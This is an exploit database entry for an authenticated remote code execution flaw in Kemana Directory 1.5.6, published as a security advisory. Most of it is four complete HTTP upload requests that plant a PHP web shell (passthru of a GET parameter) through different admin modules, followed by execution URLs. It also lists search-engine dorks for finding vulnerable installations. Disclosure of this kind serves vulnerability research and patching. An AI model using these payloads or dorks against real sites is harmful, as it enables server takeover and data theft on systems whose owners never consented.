Kemana Directory 1.5.6 – Remote Code Execution

• Exploit Database
• 34 阅读

• 作者： LiquidWorm
  日期： 2014-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32507/

• 
  Kemana Directory 1.5.6 Remote Code Execution
  
  
  Vendor: C97net
  Product web page: http://www.c97.net
  Affected version: 1.5.6
  
  Summary: Experience the ultimate directory script solution
  with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
  Unique Kemana's features including: CMS engine based on our
  qEngine, multiple directories support, user friendly administration
  control panel, easy to use custom fields, unsurpassed flexibility.
  
  Desc: Kemana Directory suffers from an authenticated arbitrary code
  execution. The vulnerability is caused due to the improper verification
  of uploaded files in several modules thru several POST parameters.
  This can be exploited to execute arbitrary PHP code by uploading
  a malicious PHP script file that will be stored in '/public/image'
  directory. Minimum permissions needed for a user to upload any file:
  
  User level: Regular (param: user_level=1)
  Admin level: Editor (param: admin_level=3)
  
  Only the 'Super Admin' level makes the Tool 'File Manager' available.
  
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5178
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5178.php
  
  
  Dork #1: intitle:powered by c97.net
  Dork #2: intitle:powered by qEngine
  Dork #3: intitle:powered by Kemana.c97.net
  Dork #4: intitle:powered by Cart2.c97.net
  
  
  
  07.03.2014
  
  ---
  
  
   #1 (Modules > Articles > Manage Categories > Create A New Category)
  
  POST http://localhost/kemana/admin/task.php?mod=portal&run=pcat_edit.php& HTTP/1.1
  
  
  -----------------------------18727540915953
  Content-Disposition: form-data; name="AXSRF_token"
  
  12adff6127dfa3355ac24bad4a4c8687
  -----------------------------18727540915953
  Content-Disposition: form-data; name="qadmin_cmd"
  
  new
  -----------------------------18727540915953
  Content-Disposition: form-data; name="qadmin_process"
  
  1
  -----------------------------18727540915953
  Content-Disposition: form-data; name="primary_key"
  
  cat_id
  -----------------------------18727540915953
  Content-Disposition: form-data; name="primary_val"
  
  dummy
  -----------------------------18727540915953
  Content-Disposition: form-data; name="parent"
  
  0
  -----------------------------18727540915953
  Content-Disposition: form-data; name="cat_name"
  
  ZSL
  -----------------------------18727540915953
  Content-Disposition: form-data; name="cat_note"
  
  nothing to note
  -----------------------------18727540915953
  Content-Disposition: form-data; name="cat_keywords"
  
  Zero Science Lab
  -----------------------------18727540915953
  Content-Disposition: form-data; name="cat_img"; filename="shell.php"
  Content-Type: application/octet-stream
  
  <?php passthru($_GET['cmd']); ?>
  -----------------------------18727540915953--
  
  
  Upload location: http://localhost/kemana/public/image/
  Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
  
  
  
  
   #2 (Modules > qBanner > Manage Banner > Add Entry)
  
  POST http://localhost/kemana/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
  
  
  -----------------------------225222869427624
  Content-Disposition: form-data; name="AXSRF_token"
  
  52e9c9ff9bb251a144b82a662496f5b8
  -----------------------------225222869427624
  Content-Disposition: form-data; name="qadmin_cmd"
  
  new
  -----------------------------225222869427624
  Content-Disposition: form-data; name="qadmin_process"
  
  1
  -----------------------------225222869427624
  Content-Disposition: form-data; name="qadmin_savenew"
  
  0
  -----------------------------225222869427624
  Content-Disposition: form-data; name="primary_key"
  
  page_id
  -----------------------------225222869427624
  Content-Disposition: form-data; name="primary_val"
  
  dummy
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_image"; filename="shell.php"
  Content-Type: application/octet-stream
  
  <?php passthru($_GET['cmd']); ?>
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_title"
  
  ZSL
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_keyword"
  
  http://www.zeroscience.mk
  -----------------------------225222869427624
  Content-Disposition: form-data; name="group_id"
  
  QBANR
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_body"
  
  This page is part of qBanner module. Please use qBanner Manager to edit this page.
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_allow_comment"
  
  -----------------------------225222869427624
  Content-Disposition: form-data; name="page_list"
  
  -----------------------------225222869427624--
  
  
  Upload location: http://localhost/kemana/public/image/
  Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
  
  
  
  
   #3 (Tools > File Manager > Upload)
  
  POST http://localhost/kemana/admin/fman/upload_process.php HTTP/1.1
  
  
  -----------------------------76802486520945
  Content-Disposition: form-data; name="chdir"
  
  -----------------------------76802486520945
  Content-Disposition: form-data; name="n"
  
  5
  -----------------------------76802486520945
  Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
  Content-Type: application/octet-stream
  
  <?php passthru($_GET['cmd']); ?>
  -----------------------------76802486520945
  Content-Disposition: form-data; name="userfile_2"; filename=""
  Content-Type: application/octet-stream
  
  -----------------------------76802486520945
  Content-Disposition: form-data; name="userfile_3"; filename=""
  Content-Type: application/octet-stream
  
  -----------------------------76802486520945
  Content-Disposition: form-data; name="userfile_4"; filename=""
  Content-Type: application/octet-stream
  
  -----------------------------76802486520945
  Content-Disposition: form-data; name="userfile_5"; filename=""
  Content-Type: application/octet-stream
  
  -----------------------------76802486520945--
  
  
  Upload location: Anywhere within the webroot folder and its subfolders.
  Exec: http://localhost/kemana/shell.php?cmd=whoami
  
  
  
  
   #4 (Contents > Slideshow > Add Entry)
  
  POST http://localhost/kemana/admin/featured_content.php? HTTP/1.1
  
  
  -----------------------------9813040432632
  Content-Disposition: form-data; name="AXSRF_token"
  
  516e6705d27d7d242d948d16b18a6339
  -----------------------------9813040432632
  Content-Disposition: form-data; name="qadmin_cmd"
  
  new
  -----------------------------9813040432632
  Content-Disposition: form-data; name="qadmin_process"
  
  1
  -----------------------------9813040432632
  Content-Disposition: form-data; name="primary_key"
  
  idx
  -----------------------------9813040432632
  Content-Disposition: form-data; name="primary_val"
  
  dummy
  -----------------------------9813040432632
  Content-Disposition: form-data; name="feat_title"
  
  Zero Science Lab
  -----------------------------9813040432632
  Content-Disposition: form-data; name="feat_img"; filename="shell.php"
  Content-Type: application/octet-stream
  
  <?php passthru($_GET['cmd']); ?>
  -----------------------------9813040432632
  Content-Disposition: form-data; name="feat_url"
  
  http://www.zeroscience.mk
  -----------------------------9813040432632
  Content-Disposition: form-data; name="feat_text"
  
  <p>TEST</p>
  -----------------------------9813040432632--
  
  
  Upload location: http://localhost/kemana/public/image/
  Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami